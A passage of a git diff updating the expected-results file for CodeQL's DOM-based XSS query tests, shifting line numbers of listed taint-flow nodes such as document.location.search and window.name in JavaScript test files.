a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/Xss.expected b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/Xss.expected index eb46033824f4..9b8f27cdc70c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/Xss.expected +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/Xss.expected @@ -152,7 +152,7 @@ nodes | dragAndDrop.ts:73:29:73:39 | droppedHtml | semmle.label | droppedHtml | | event-handler-receiver.js:2:31:2:83 | '

    ' | semmle.label | '

    ' | | event-handler-receiver.js:2:49:2:61 | location.href | semmle.label | location.href | -| express.js:7:15:7:33 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:6:15:6:33 | req.param("wobble") | semmle.label | req.param("wobble") | | jquery.js:2:7:2:40 | tainted | semmle.label | tainted | | jquery.js:2:17:2:40 | documen ... .search | semmle.label | documen ... .search | | jquery.js:4:5:4:11 | tainted | semmle.label | tainted | @@ -202,8 +202,8 @@ nodes | jwt-server.js:7:17:7:35 | req.param("wobble") | semmle.label | req.param("wobble") | | jwt-server.js:9:16:9:20 | taint | semmle.label | taint | | jwt-server.js:9:55:9:61 | decoded | semmle.label | decoded | -| jwt-server.js:11:19:11:25 | decoded | semmle.label | decoded | -| jwt-server.js:11:19:11:29 | decoded.foo | semmle.label | decoded.foo | +| jwt-server.js:10:19:10:25 | decoded | semmle.label | decoded | +| jwt-server.js:10:19:10:29 | decoded.foo | semmle.label | decoded.foo | | nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | semmle.label | `Hi, yo ... sage}.` | | nodemailer.js:13:50:13:66 | req.query.message | semmle.label | req.query.message | | optionalSanitizer.js:2:7:2:39 | target | semmle.label | target | @@ -343,9 +343,9 @@ nodes | translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | | translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | | translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | -| translate.js:9:27:9:38 | searchParams | semmle.label | searchParams | -| translate.js:9:27:9:38 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| translate.js:9:27:9:50 | searchP ... 'term') | semmle.label | searchP ... 'term') | +| translate.js:8:27:8:38 | searchParams | semmle.label | searchParams | +| translate.js:8:27:8:38 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| translate.js:8:27:8:50 | searchP ... 'term') | semmle.label | searchP ... 'term') | | trusted-types-lib.js:1:28:1:28 | x | semmle.label | x | | trusted-types-lib.js:2:12:2:12 | x | semmle.label | x | | trusted-types.js:3:62:3:62 | x | semmle.label | x | @@ -368,240 +368,240 @@ nodes | tst3.js:10:38:10:43 | data.p | semmle.label | data.p | | tst.js:2:7:2:39 | target | semmle.label | target | | tst.js:2:16:2:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:5:18:5:23 | target | semmle.label | target | -| tst.js:8:18:8:126 | "" | semmle.label | "" | -| tst.js:8:37:8:58 | documen ... on.href | semmle.label | documen ... on.href | -| tst.js:8:37:8:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:8:37:8:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:12:5:12:42 | '
    ' | semmle.label | '
    ' | -| tst.js:12:28:12:33 | target | semmle.label | target | -| tst.js:17:7:17:56 | params | semmle.label | params | -| tst.js:17:7:17:56 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | semmle.label | (new UR ... ation)) [searchParams, MapValue] | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | semmle.label | (new UR ... ation)) [searchParams] | -| tst.js:17:16:17:56 | (new UR ... hParams | semmle.label | (new UR ... hParams | -| tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | semmle.label | (new UR ... hParams [MapValue] | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | -| tst.js:17:25:17:41 | document.location | semmle.label | document.location | -| tst.js:18:18:18:23 | params | semmle.label | params | -| tst.js:18:18:18:23 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:18:18:18:35 | params.get('name') | semmle.label | params.get('name') | -| tst.js:20:7:20:61 | searchParams | semmle.label | searchParams | -| tst.js:20:7:20:61 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| tst.js:20:22:20:61 | new URL ... ing(1)) | semmle.label | new URL ... ing(1)) | -| tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | semmle.label | new URL ... ing(1)) [MapValue] | -| tst.js:20:42:20:47 | target | semmle.label | target | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:21:18:21:29 | searchParams | semmle.label | searchParams | -| tst.js:21:18:21:29 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| tst.js:21:18:21:41 | searchP ... 'name') | semmle.label | searchP ... 'name') | -| tst.js:24:14:24:19 | target | semmle.label | target | -| tst.js:26:18:26:23 | target | semmle.label | target | -| tst.js:28:5:28:28 | documen ... .search | semmle.label | documen ... .search | -| tst.js:31:10:31:33 | documen ... .search | semmle.label | documen ... .search | -| tst.js:34:16:34:20 | bar() | semmle.label | bar() | -| tst.js:36:14:36:14 | x | semmle.label | x | -| tst.js:37:10:37:10 | x | semmle.label | x | -| tst.js:40:16:40:44 | baz(doc ... search) | semmle.label | baz(doc ... search) | -| tst.js:40:20:40:43 | documen ... .search | semmle.label | documen ... .search | -| tst.js:42:15:42:15 | s | semmle.label | s | -| tst.js:42:15:42:15 | s | semmle.label | s | -| tst.js:43:10:43:31 | "
    " ...
    " | semmle.label | "
    " ...
    " | -| tst.js:43:20:43:20 | s | semmle.label | s | -| tst.js:43:20:43:20 | s | semmle.label | s | -| tst.js:46:16:46:45 | wrap(do ... search) | semmle.label | wrap(do ... search) | +| tst.js:4:18:4:23 | target | semmle.label | target | +| tst.js:6:18:6:126 | "" | semmle.label | "" | +| tst.js:6:37:6:58 | documen ... on.href | semmle.label | documen ... on.href | +| tst.js:6:37:6:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:6:37:6:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:9:5:9:42 | '
    ' | semmle.label | '
    ' | +| tst.js:9:28:9:33 | target | semmle.label | target | +| tst.js:14:7:14:56 | params | semmle.label | params | +| tst.js:14:7:14:56 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | semmle.label | (new UR ... ation)) [searchParams, MapValue] | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | semmle.label | (new UR ... ation)) [searchParams] | +| tst.js:14:16:14:56 | (new UR ... hParams | semmle.label | (new UR ... hParams | +| tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | semmle.label | (new UR ... hParams [MapValue] | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | +| tst.js:14:25:14:41 | document.location | semmle.label | document.location | +| tst.js:15:18:15:23 | params | semmle.label | params | +| tst.js:15:18:15:23 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:15:18:15:35 | params.get('name') | semmle.label | params.get('name') | +| tst.js:17:7:17:61 | searchParams | semmle.label | searchParams | +| tst.js:17:7:17:61 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| tst.js:17:22:17:61 | new URL ... ing(1)) | semmle.label | new URL ... ing(1)) | +| tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | semmle.label | new URL ... ing(1)) [MapValue] | +| tst.js:17:42:17:47 | target | semmle.label | target | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:18:18:18:29 | searchParams | semmle.label | searchParams | +| tst.js:18:18:18:29 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| tst.js:18:18:18:41 | searchP ... 'name') | semmle.label | searchP ... 'name') | +| tst.js:21:14:21:19 | target | semmle.label | target | +| tst.js:22:18:22:23 | target | semmle.label | target | +| tst.js:24:5:24:28 | documen ... .search | semmle.label | documen ... .search | +| tst.js:27:10:27:33 | documen ... .search | semmle.label | documen ... .search | +| tst.js:29:16:29:20 | bar() | semmle.label | bar() | +| tst.js:31:14:31:14 | x | semmle.label | x | +| tst.js:32:10:32:10 | x | semmle.label | x | +| tst.js:34:16:34:44 | baz(doc ... search) | semmle.label | baz(doc ... search) | +| tst.js:34:20:34:43 | documen ... .search | semmle.label | documen ... .search | +| tst.js:36:15:36:15 | s | semmle.label | s | +| tst.js:36:15:36:15 | s | semmle.label | s | +| tst.js:37:10:37:31 | "
    " ...
    " | semmle.label | "
    " ...
    " | +| tst.js:37:20:37:20 | s | semmle.label | s | +| tst.js:37:20:37:20 | s | semmle.label | s | +| tst.js:39:16:39:45 | wrap(do ... search) | semmle.label | wrap(do ... search) | +| tst.js:39:21:39:44 | documen ... .search | semmle.label | documen ... .search | +| tst.js:41:15:41:15 | s | semmle.label | s | +| tst.js:43:12:43:12 | s | semmle.label | s | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:46:16:46:45 | chop(do ... search) | semmle.label | chop(do ... search) | | tst.js:46:21:46:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:48:15:48:15 | s | semmle.label | s | -| tst.js:50:12:50:12 | s | semmle.label | s | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:54:16:54:45 | chop(do ... search) | semmle.label | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:56:16:56:45 | chop(do ... search) | semmle.label | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:58:16:58:32 | wrap(chop(bar())) | semmle.label | wrap(chop(bar())) | -| tst.js:58:21:58:31 | chop(bar()) | semmle.label | chop(bar()) | -| tst.js:58:21:58:31 | chop(bar()) | semmle.label | chop(bar()) | -| tst.js:58:26:58:30 | bar() | semmle.label | bar() | -| tst.js:60:34:60:34 | s | semmle.label | s | -| tst.js:62:18:62:18 | s | semmle.label | s | -| tst.js:64:25:64:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:65:25:65:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:68:16:68:20 | bar() | semmle.label | bar() | -| tst.js:70:1:70:27 | [,docum ... search] [1] | semmle.label | [,docum ... search] [1] | -| tst.js:70:3:70:26 | documen ... .search | semmle.label | documen ... .search | -| tst.js:70:46:70:46 | x | semmle.label | x | -| tst.js:73:20:73:20 | x | semmle.label | x | -| tst.js:77:49:77:72 | documen ... .search | semmle.label | documen ... .search | -| tst.js:81:26:81:49 | documen ... .search | semmle.label | documen ... .search | -| tst.js:82:25:82:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:84:33:84:56 | documen ... .search | semmle.label | documen ... .search | -| tst.js:85:32:85:55 | documen ... .search | semmle.label | documen ... .search | -| tst.js:90:39:90:62 | documen ... .search | semmle.label | documen ... .search | -| tst.js:96:30:96:53 | documen ... .search | semmle.label | documen ... .search | -| tst.js:102:25:102:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:107:7:107:44 | v | semmle.label | v | -| tst.js:107:11:107:34 | documen ... .search | semmle.label | documen ... .search | -| tst.js:107:11:107:44 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | -| tst.js:110:18:110:18 | v | semmle.label | v | -| tst.js:136:18:136:18 | v | semmle.label | v | -| tst.js:148:29:148:50 | window. ... .search | semmle.label | window. ... .search | -| tst.js:151:29:151:29 | v | semmle.label | v | -| tst.js:151:49:151:49 | v | semmle.label | v | -| tst.js:155:29:155:46 | xssSourceService() | semmle.label | xssSourceService() | -| tst.js:158:40:158:61 | window. ... .search | semmle.label | window. ... .search | -| tst.js:177:9:177:41 | target | semmle.label | target | -| tst.js:177:18:177:41 | documen ... .search | semmle.label | documen ... .search | -| tst.js:180:28:180:33 | target | semmle.label | target | -| tst.js:184:9:184:42 | tainted | semmle.label | tainted | -| tst.js:184:19:184:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:186:31:186:37 | tainted | semmle.label | tainted | -| tst.js:188:42:188:48 | tainted | semmle.label | tainted | -| tst.js:189:33:189:39 | tainted | semmle.label | tainted | -| tst.js:191:54:191:60 | tainted | semmle.label | tainted | -| tst.js:192:45:192:51 | tainted | semmle.label | tainted | -| tst.js:193:49:193:55 | tainted | semmle.label | tainted | -| tst.js:197:9:197:42 | tainted | semmle.label | tainted | -| tst.js:197:19:197:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:199:67:199:73 | tainted | semmle.label | tainted | -| tst.js:200:67:200:73 | tainted | semmle.label | tainted | -| tst.js:204:35:204:41 | tainted | semmle.label | tainted | -| tst.js:206:46:206:52 | tainted | semmle.label | tainted | -| tst.js:207:38:207:44 | tainted | semmle.label | tainted | -| tst.js:208:35:208:41 | tainted | semmle.label | tainted | -| tst.js:212:28:212:46 | this.state.tainted1 | semmle.label | this.state.tainted1 | -| tst.js:213:28:213:46 | this.state.tainted2 | semmle.label | this.state.tainted2 | -| tst.js:214:28:214:46 | this.state.tainted3 | semmle.label | this.state.tainted3 | -| tst.js:218:32:218:49 | prevState.tainted4 | semmle.label | prevState.tainted4 | -| tst.js:225:28:225:46 | this.props.tainted1 | semmle.label | this.props.tainted1 | -| tst.js:226:28:226:46 | this.props.tainted2 | semmle.label | this.props.tainted2 | -| tst.js:227:28:227:46 | this.props.tainted3 | semmle.label | this.props.tainted3 | -| tst.js:231:32:231:49 | prevProps.tainted4 | semmle.label | prevProps.tainted4 | -| tst.js:236:35:236:41 | tainted | semmle.label | tainted | -| tst.js:238:20:238:26 | tainted | semmle.label | tainted | -| tst.js:240:23:240:29 | tainted | semmle.label | tainted | -| tst.js:241:23:241:29 | tainted | semmle.label | tainted | -| tst.js:247:39:247:55 | props.propTainted | semmle.label | props.propTainted | -| tst.js:251:60:251:82 | this.st ... Tainted | semmle.label | this.st ... Tainted | -| tst.js:255:23:255:29 | tainted | semmle.label | tainted | -| tst.js:259:7:259:17 | window.name | semmle.label | window.name | -| tst.js:260:7:260:10 | name | semmle.label | name | -| tst.js:264:11:264:21 | window.name | semmle.label | window.name | -| tst.js:280:22:280:29 | location | semmle.label | location | -| tst.js:285:9:285:29 | tainted | semmle.label | tainted | -| tst.js:285:19:285:29 | window.name | semmle.label | window.name | -| tst.js:288:59:288:65 | tainted | semmle.label | tainted | -| tst.js:301:9:301:16 | location | semmle.label | location | -| tst.js:302:10:302:10 | e | semmle.label | e | -| tst.js:303:20:303:20 | e | semmle.label | e | -| tst.js:308:10:308:17 | location | semmle.label | location | -| tst.js:310:10:310:10 | e | semmle.label | e | -| tst.js:311:20:311:20 | e | semmle.label | e | -| tst.js:316:35:316:42 | location | semmle.label | location | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | -| tst.js:327:18:327:34 | document.location | semmle.label | document.location | -| tst.js:331:7:331:43 | params | semmle.label | params | -| tst.js:331:7:331:43 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | semmle.label | getTaintedUrl() [searchParams, MapValue] | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | semmle.label | getTaintedUrl() [searchParams] | -| tst.js:331:16:331:43 | getTain ... hParams | semmle.label | getTain ... hParams | -| tst.js:331:16:331:43 | getTain ... hParams [MapValue] | semmle.label | getTain ... hParams [MapValue] | -| tst.js:332:18:332:23 | params | semmle.label | params | -| tst.js:332:18:332:23 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:332:18:332:35 | params.get('name') | semmle.label | params.get('name') | -| tst.js:341:12:341:37 | new URL ... cation) [hash] | semmle.label | new URL ... cation) [hash] | -| tst.js:341:20:341:36 | document.location | semmle.label | document.location | -| tst.js:343:5:343:12 | getUrl() [hash] | semmle.label | getUrl() [hash] | -| tst.js:343:5:343:17 | getUrl().hash | semmle.label | getUrl().hash | -| tst.js:343:5:343:30 | getUrl( ... ring(1) | semmle.label | getUrl( ... ring(1) | -| tst.js:348:7:348:39 | target | semmle.label | target | -| tst.js:348:16:348:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:349:12:349:17 | target | semmle.label | target | -| tst.js:355:10:355:42 | target | semmle.label | target | -| tst.js:355:19:355:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:356:16:356:21 | target | semmle.label | target | -| tst.js:357:20:357:25 | target | semmle.label | target | -| tst.js:360:21:360:26 | target | semmle.label | target | -| tst.js:363:18:363:23 | target | semmle.label | target | -| tst.js:371:7:371:39 | target | semmle.label | target | -| tst.js:371:16:371:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:374:18:374:23 | target | semmle.label | target | -| tst.js:381:7:381:39 | target | semmle.label | target | -| tst.js:381:16:381:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:384:18:384:23 | target | semmle.label | target | -| tst.js:386:18:386:23 | target | semmle.label | target | -| tst.js:386:18:386:29 | target.taint | semmle.label | target.taint | -| tst.js:391:3:391:8 | [post update] target [taint3] | semmle.label | [post update] target [taint3] | -| tst.js:391:19:391:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:392:18:392:23 | target [taint3] | semmle.label | target [taint3] | -| tst.js:392:18:392:30 | target.taint3 | semmle.label | target.taint3 | -| tst.js:397:18:397:23 | target | semmle.label | target | -| tst.js:397:18:397:30 | target.taint5 | semmle.label | target.taint5 | -| tst.js:406:18:406:23 | target | semmle.label | target | -| tst.js:406:18:406:30 | target.taint7 | semmle.label | target.taint7 | -| tst.js:408:3:408:8 | [post update] target [taint8] | semmle.label | [post update] target [taint8] | -| tst.js:408:19:408:24 | target | semmle.label | target | -| tst.js:408:19:408:24 | target [taint8] | semmle.label | target [taint8] | -| tst.js:408:19:408:31 | target.taint8 | semmle.label | target.taint8 | -| tst.js:409:18:409:23 | target [taint8] | semmle.label | target [taint8] | -| tst.js:409:18:409:30 | target.taint8 | semmle.label | target.taint8 | -| tst.js:416:7:416:46 | payload | semmle.label | payload | -| tst.js:416:17:416:36 | window.location.hash | semmle.label | window.location.hash | -| tst.js:416:17:416:46 | window. ... bstr(1) | semmle.label | window. ... bstr(1) | -| tst.js:417:18:417:24 | payload | semmle.label | payload | -| tst.js:419:7:419:55 | match | semmle.label | match | -| tst.js:419:15:419:34 | window.location.hash | semmle.label | window.location.hash | -| tst.js:419:15:419:55 | window. ... (\\w+)/) | semmle.label | window. ... (\\w+)/) | -| tst.js:421:20:421:24 | match | semmle.label | match | -| tst.js:421:20:421:27 | match[1] | semmle.label | match[1] | -| tst.js:424:18:424:37 | window.location.hash | semmle.label | window.location.hash | -| tst.js:424:18:424:48 | window. ... it('#') [1] | semmle.label | window. ... it('#') [1] | -| tst.js:424:18:424:51 | window. ... '#')[1] | semmle.label | window. ... '#')[1] | -| tst.js:428:7:428:39 | target | semmle.label | target | -| tst.js:428:16:428:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:430:18:430:23 | target | semmle.label | target | -| tst.js:430:18:430:89 | target. ... data>') | semmle.label | target. ... data>') | -| tst.js:436:6:436:38 | source | semmle.label | source | -| tst.js:436:15:436:38 | documen ... .search | semmle.label | documen ... .search | -| tst.js:440:28:440:33 | source | semmle.label | source | -| tst.js:441:33:441:38 | source | semmle.label | source | -| tst.js:442:34:442:39 | source | semmle.label | source | -| tst.js:443:41:443:46 | source | semmle.label | source | -| tst.js:444:44:444:49 | source | semmle.label | source | -| tst.js:445:32:445:37 | source | semmle.label | source | -| tst.js:453:7:453:39 | source | semmle.label | source | -| tst.js:453:16:453:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:455:18:455:23 | source | semmle.label | source | -| tst.js:456:18:456:42 | ansiToH ... source) | semmle.label | ansiToH ... source) | -| tst.js:456:36:456:41 | source | semmle.label | source | -| tst.js:460:6:460:38 | source | semmle.label | source | -| tst.js:460:15:460:38 | documen ... .search | semmle.label | documen ... .search | -| tst.js:463:21:463:26 | source | semmle.label | source | -| tst.js:465:19:465:24 | source | semmle.label | source | -| tst.js:467:20:467:25 | source | semmle.label | source | -| tst.js:471:7:471:46 | url | semmle.label | url | -| tst.js:471:13:471:36 | documen ... .search | semmle.label | documen ... .search | -| tst.js:471:13:471:46 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | -| tst.js:473:19:473:21 | url | semmle.label | url | -| tst.js:474:26:474:28 | url | semmle.label | url | -| tst.js:475:25:475:27 | url | semmle.label | url | -| tst.js:476:20:476:22 | url | semmle.label | url | -| tst.js:486:22:486:24 | url | semmle.label | url | -| tst.js:491:23:491:35 | location.hash | semmle.label | location.hash | -| tst.js:491:23:491:45 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | -| tst.js:494:18:494:30 | location.hash | semmle.label | location.hash | -| tst.js:494:18:494:40 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | -| tst.js:501:33:501:63 | decodeU ... n.hash) | semmle.label | decodeU ... n.hash) | -| tst.js:501:43:501:62 | window.location.hash | semmle.label | window.location.hash | -| tst.js:508:7:508:39 | target | semmle.label | target | -| tst.js:508:16:508:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:509:18:509:23 | target | semmle.label | target | -| tst.js:509:18:509:54 | target. ... "), '') | semmle.label | target. ... "), '') | +| tst.js:47:16:47:45 | chop(do ... search) | semmle.label | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | semmle.label | documen ... .search | +| tst.js:48:16:48:32 | wrap(chop(bar())) | semmle.label | wrap(chop(bar())) | +| tst.js:48:21:48:31 | chop(bar()) | semmle.label | chop(bar()) | +| tst.js:48:21:48:31 | chop(bar()) | semmle.label | chop(bar()) | +| tst.js:48:26:48:30 | bar() | semmle.label | bar() | +| tst.js:50:34:50:34 | s | semmle.label | s | +| tst.js:51:18:51:18 | s | semmle.label | s | +| tst.js:53:25:53:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:54:25:54:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:56:16:56:20 | bar() | semmle.label | bar() | +| tst.js:58:1:58:27 | [,docum ... search] [1] | semmle.label | [,docum ... search] [1] | +| tst.js:58:3:58:26 | documen ... .search | semmle.label | documen ... .search | +| tst.js:58:46:58:46 | x | semmle.label | x | +| tst.js:60:20:60:20 | x | semmle.label | x | +| tst.js:63:49:63:72 | documen ... .search | semmle.label | documen ... .search | +| tst.js:67:26:67:49 | documen ... .search | semmle.label | documen ... .search | +| tst.js:68:25:68:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:70:33:70:56 | documen ... .search | semmle.label | documen ... .search | +| tst.js:71:32:71:55 | documen ... .search | semmle.label | documen ... .search | +| tst.js:76:39:76:62 | documen ... .search | semmle.label | documen ... .search | +| tst.js:82:30:82:53 | documen ... .search | semmle.label | documen ... .search | +| tst.js:88:25:88:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:93:7:93:44 | v | semmle.label | v | +| tst.js:93:11:93:34 | documen ... .search | semmle.label | documen ... .search | +| tst.js:93:11:93:44 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | +| tst.js:95:18:95:18 | v | semmle.label | v | +| tst.js:120:18:120:18 | v | semmle.label | v | +| tst.js:132:29:132:50 | window. ... .search | semmle.label | window. ... .search | +| tst.js:135:29:135:29 | v | semmle.label | v | +| tst.js:135:49:135:49 | v | semmle.label | v | +| tst.js:139:29:139:46 | xssSourceService() | semmle.label | xssSourceService() | +| tst.js:142:40:142:61 | window. ... .search | semmle.label | window. ... .search | +| tst.js:161:9:161:41 | target | semmle.label | target | +| tst.js:161:18:161:41 | documen ... .search | semmle.label | documen ... .search | +| tst.js:164:28:164:33 | target | semmle.label | target | +| tst.js:168:9:168:42 | tainted | semmle.label | tainted | +| tst.js:168:19:168:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:170:31:170:37 | tainted | semmle.label | tainted | +| tst.js:172:42:172:48 | tainted | semmle.label | tainted | +| tst.js:173:33:173:39 | tainted | semmle.label | tainted | +| tst.js:175:54:175:60 | tainted | semmle.label | tainted | +| tst.js:176:45:176:51 | tainted | semmle.label | tainted | +| tst.js:177:49:177:55 | tainted | semmle.label | tainted | +| tst.js:181:9:181:42 | tainted | semmle.label | tainted | +| tst.js:181:19:181:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:183:67:183:73 | tainted | semmle.label | tainted | +| tst.js:184:67:184:73 | tainted | semmle.label | tainted | +| tst.js:188:35:188:41 | tainted | semmle.label | tainted | +| tst.js:190:46:190:52 | tainted | semmle.label | tainted | +| tst.js:191:38:191:44 | tainted | semmle.label | tainted | +| tst.js:192:35:192:41 | tainted | semmle.label | tainted | +| tst.js:196:28:196:46 | this.state.tainted1 | semmle.label | this.state.tainted1 | +| tst.js:197:28:197:46 | this.state.tainted2 | semmle.label | this.state.tainted2 | +| tst.js:198:28:198:46 | this.state.tainted3 | semmle.label | this.state.tainted3 | +| tst.js:202:32:202:49 | prevState.tainted4 | semmle.label | prevState.tainted4 | +| tst.js:209:28:209:46 | this.props.tainted1 | semmle.label | this.props.tainted1 | +| tst.js:210:28:210:46 | this.props.tainted2 | semmle.label | this.props.tainted2 | +| tst.js:211:28:211:46 | this.props.tainted3 | semmle.label | this.props.tainted3 | +| tst.js:215:32:215:49 | prevProps.tainted4 | semmle.label | prevProps.tainted4 | +| tst.js:220:35:220:41 | tainted | semmle.label | tainted | +| tst.js:222:20:222:26 | tainted | semmle.label | tainted | +| tst.js:224:23:224:29 | tainted | semmle.label | tainted | +| tst.js:225:23:225:29 | tainted | semmle.label | tainted | +| tst.js:231:39:231:55 | props.propTainted | semmle.label | props.propTainted | +| tst.js:235:60:235:82 | this.st ... Tainted | semmle.label | this.st ... Tainted | +| tst.js:239:23:239:29 | tainted | semmle.label | tainted | +| tst.js:243:7:243:17 | window.name | semmle.label | window.name | +| tst.js:244:7:244:10 | name | semmle.label | name | +| tst.js:248:11:248:21 | window.name | semmle.label | window.name | +| tst.js:264:22:264:29 | location | semmle.label | location | +| tst.js:269:9:269:29 | tainted | semmle.label | tainted | +| tst.js:269:19:269:29 | window.name | semmle.label | window.name | +| tst.js:272:59:272:65 | tainted | semmle.label | tainted | +| tst.js:285:9:285:16 | location | semmle.label | location | +| tst.js:286:10:286:10 | e | semmle.label | e | +| tst.js:287:20:287:20 | e | semmle.label | e | +| tst.js:292:10:292:17 | location | semmle.label | location | +| tst.js:294:10:294:10 | e | semmle.label | e | +| tst.js:295:20:295:20 | e | semmle.label | e | +| tst.js:300:35:300:42 | location | semmle.label | location | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | +| tst.js:311:18:311:34 | document.location | semmle.label | document.location | +| tst.js:315:7:315:43 | params | semmle.label | params | +| tst.js:315:7:315:43 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | semmle.label | getTaintedUrl() [searchParams, MapValue] | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | semmle.label | getTaintedUrl() [searchParams] | +| tst.js:315:16:315:43 | getTain ... hParams | semmle.label | getTain ... hParams | +| tst.js:315:16:315:43 | getTain ... hParams [MapValue] | semmle.label | getTain ... hParams [MapValue] | +| tst.js:316:18:316:23 | params | semmle.label | params | +| tst.js:316:18:316:23 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:316:18:316:35 | params.get('name') | semmle.label | params.get('name') | +| tst.js:325:12:325:37 | new URL ... cation) [hash] | semmle.label | new URL ... cation) [hash] | +| tst.js:325:20:325:36 | document.location | semmle.label | document.location | +| tst.js:327:5:327:12 | getUrl() [hash] | semmle.label | getUrl() [hash] | +| tst.js:327:5:327:17 | getUrl().hash | semmle.label | getUrl().hash | +| tst.js:327:5:327:30 | getUrl( ... ring(1) | semmle.label | getUrl( ... ring(1) | +| tst.js:332:7:332:39 | target | semmle.label | target | +| tst.js:332:16:332:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:333:12:333:17 | target | semmle.label | target | +| tst.js:339:10:339:42 | target | semmle.label | target | +| tst.js:339:19:339:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:340:16:340:21 | target | semmle.label | target | +| tst.js:341:20:341:25 | target | semmle.label | target | +| tst.js:344:21:344:26 | target | semmle.label | target | +| tst.js:347:18:347:23 | target | semmle.label | target | +| tst.js:355:7:355:39 | target | 